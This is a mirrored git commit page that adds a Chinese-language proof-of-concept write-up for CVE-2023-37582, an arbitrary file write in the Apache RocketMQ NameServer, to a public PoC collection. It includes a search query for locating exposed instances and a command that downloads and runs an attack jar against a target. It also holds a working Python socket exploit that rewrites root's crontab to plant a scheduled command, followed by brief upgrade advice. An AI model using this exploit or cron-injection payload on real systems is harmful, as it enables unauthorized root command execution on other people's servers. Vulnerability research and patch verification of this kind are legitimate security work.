mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 02:37:58 +00:00
update CVE-2023-37582
This commit is contained in:
Threekiii
parent
4fb127011b
commit
2b9d17c3d2
88
中间件漏洞/Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582.md
Normal file
88
中间件漏洞/Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582.md
Normal file
@ -0,0 +1,88 @@
|
|||||||
|
# Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582
|
||||||
|
|
||||||
|
## 漏洞描述
|
||||||
|
|
||||||
|
Apache RocketMQ 是一个分布式消息和流处理平台,具有低延迟、高性能和可靠性、万亿级容量和灵活的可扩展性。
|
||||||
|
|
||||||
|
在 RocketMQ 版本 5.1.1 及以下版本中,NameServer 组件存在一个任意文件写入漏洞。该漏洞存在于 RocketMQ 的 NameServer 组件的配置更新功能中。通过向 NameServer 发送 `UPDATE_NAMESRV_CONFIG` 命令,攻击者可以修改 `configStorePath` 配置项及其内容,从而导致任意文件写入。
|
||||||
|
|
||||||
|
该漏洞源于对 [CVE-2023-33246](https://github.com/vulhub/vulhub/tree/master/rocketmq/CVE-2023-33246) 的不完全修复。在处理 CVE-2023-33246 时,官方团队建立了一个不能被修改的配置项黑名单。然而,补丁错误地将黑名单指定为 `configStorePathName`,而应该是 `configStorePath`,导致了这一结果。
|
||||||
|
|
||||||
|
参考链接:
|
||||||
|
|
||||||
|
- https://github.com/apache/rocketmq/pull/6843
|
||||||
|
- https://drun1baby.top/2023/11/21/CVE-2023-37582-Apache-RocketMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
|
||||||
|
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT
|
||||||
|
|
||||||
|
## 漏洞影响
|
||||||
|
|
||||||
|
```
|
||||||
|
RocketMQ < 4.9.7
|
||||||
|
RocketMQ < 5.1.2
|
||||||
|
```
|
||||||
|
|
||||||
|
## 网络测绘
|
||||||
|
|
||||||
|
```
|
||||||
|
title="RocketMQ"
|
||||||
|
```
|
||||||
|
|
||||||
|
## 环境搭建
|
||||||
|
|
||||||
|
Vulhub 执行如下命令启动一个 RocketMQ NameServer 5.1.0:
|
||||||
|
|
||||||
|
```shell
|
||||||
|
docker compose up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
环境启动后,RocketMQ 的 NameServer 将会监听在 9876 端口。
|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
|
||||||
|
使用这个 Vulhub 项目 [rocketmq-attack](https://github.com/vulhub/rocketmq-attack) 来复现漏洞并写入任意文件:
|
||||||
|
|
||||||
|
```shell
|
||||||
|
wget https://github.com/vulhub/rocketmq-attack/releases/download/1.1/rocketmq-attack-1.1-SNAPSHOT.jar
|
||||||
|
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target your-ip:9876 --file "/tmp/awesome_poc" --data "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
|
||||||
|
```
|
||||||
|
|
||||||
|
执行完成后,可以验证文件是否写入成功:
|
||||||
|
|
||||||
|
```shell
|
||||||
|
cat /tmp/awesome_poc
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
定时任务:
|
||||||
|
|
||||||
|
```python
|
||||||
|
import socket
|
||||||
|
import binascii
|
||||||
|
client = socket.socket()
|
||||||
|
# you ip port(9876)
|
||||||
|
client.connect((target_ip,target_port))
|
||||||
|
# data
|
||||||
|
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":435}'.encode('utf-8')
|
||||||
|
body='configStorePath=/var/spool/cron/crontabs/root\nbrokerConfigPath=/var/spool/cron/crontabs/root\nbindAddress=0.0.0.0\\n*/1 * * * * touch /tmp/success'.encode('utf-8')
|
||||||
|
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
|
||||||
|
head1 = '00000000'+str(hex(json_lens))[2:]
|
||||||
|
print(head1)
|
||||||
|
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
|
||||||
|
head2 = '00000000'+str(hex(all_lens))[2:]
|
||||||
|
print(head2)
|
||||||
|
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
|
||||||
|
# send
|
||||||
|
client.send(bytes.fromhex(data))
|
||||||
|
data_recv = client.recv(1024)
|
||||||
|
print(data_recv)
|
||||||
|
```
|
||||||
|
|
||||||
|
## 漏洞修复
|
||||||
|
|
||||||
|
目前官方已发布安全版本,建议受影响用户升级至:
|
||||||
|
|
||||||
|
- RocketMQ 5.x >= 5.1.2
|
||||||
|
- RocketMQ 4.x >= 4.9.7
|
||||||
|
|
||||||
|
官方补丁下载地址: https://rocketmq.apache.org/download/ ,同时建议将 NameServer、Broker 等组件部署在内网,并增加权限认证。
|
||||||
Binary file not shown.
|
After Width: | Height: | Size: 182 KiB |
Loading…
x
Reference in New Issue
Block a user